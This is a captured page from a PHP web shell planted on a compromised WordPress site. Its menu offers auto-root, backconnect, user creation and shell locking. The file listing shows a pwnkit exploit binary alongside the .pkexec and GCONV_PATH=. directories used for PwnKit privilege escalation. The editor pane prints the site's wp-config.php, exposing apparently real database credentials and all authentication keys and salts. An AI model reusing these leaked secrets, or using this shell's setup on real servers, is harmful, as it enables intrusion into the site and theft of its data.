Linux 00830bc4dc40 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4
: 172.19.0.7 | : 216.73.217.74
Cant Read [ /etc/named.conf ]
7.4.33
flexusfire
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
webpages /
lima-city /
flexusfire /
wordpress /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
533
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
index.php
14.33
KB
-rw-r--r--
license.txt
19.45
KB
-rw-r--r--
liesmich.html
8.54
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.11
KB
-rw-r--r--
wp-activate.php
6.75
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.22
KB
-rw-r--r--
wp-config-sample.php
3.58
KB
-rw-r--r--
wp-config.php
2.7
KB
-rw-r--r--
wp-cron.php
3.85
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.22
KB
-rw-r--r--
wp-login.php
46.75
KB
-rw-r--r--
wp-mail.php
8.31
KB
-rw-r--r--
wp-settings.php
18.94
KB
-rw-r--r--
wp-signup.php
30.38
KB
-rw-r--r--
wp-trackback.php
4.64
KB
-rw-r--r--
x.php
5.71
KB
-rw-r--r--
xmlrpc.php
3.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'db_349649_1' ); /** MySQL database username */ define( 'DB_USER', 'USER349649_sw0' ); /** MySQL database password */ define( 'DB_PASSWORD', 'ytIJAazSnxiXFKys' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '%BfGF<TTG_eCD*goExgZ,|`cIiN(K=yv*-{XuV%CD{AUol}S,f;/djviK&(;!/Q#' ); define( 'SECURE_AUTH_KEY', '~qZP{2HG#ItF!B-]qn_fJ]exQccF71b-DiMJq3jS/c02lr>70{*!]R-YZ|k&>~.1' ); define( 'LOGGED_IN_KEY', '}CtO5^*i3{~W~s6Y_cp(7&{=Naz;b+g/JPae*ib?S)<KH)@~6b^In6(3<fi$6lM7' ); define( 'NONCE_KEY', 'kv~BBeJ:a>P iW0whfM<U {fc1s+Y4gWu%[[(_)`)$9ee9.MdEJ8K OWdG8uQ-;X' ); define( 'AUTH_SALT', 'zjONbQ4cwQ|L~HT%,1pINN_Z:/y%TPcli#:g(&]O,-EBz;Cx3y}%Vk&lP@@$q+RL' ); define( 'SECURE_AUTH_SALT', 'td!t!lsJk$Qfc)rA~cdzuT)g|HE8Fz<QgTaUKm[bEFl+]i|/q_ ?@[D?:6M{{ #y' ); define( 'LOGGED_IN_SALT', ')>IW_G<Oa<G`x@(_DH^GX2`2B]uBWlyY;I9B~Dk#!u3>qRW Hwf,#~lvqCF)2vbQ' ); define( 'NONCE_SALT', 'leHlr%al_2@G|>qQ;[mN>0^23(P)P}w~d#zV$2UR%RpxE7K_rfJ6kc9d>_^/-Q~I' ); define( 'WP_CACHE_KEY_SALT', ']:$$~2WS^(>vsjkUhwJ/RSVtqebL{3ajH(.6/m}r[PLKA-CWRfb-|2UVQgUf{Stf' ); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'pDu5_'; /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __FILE__ ) . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close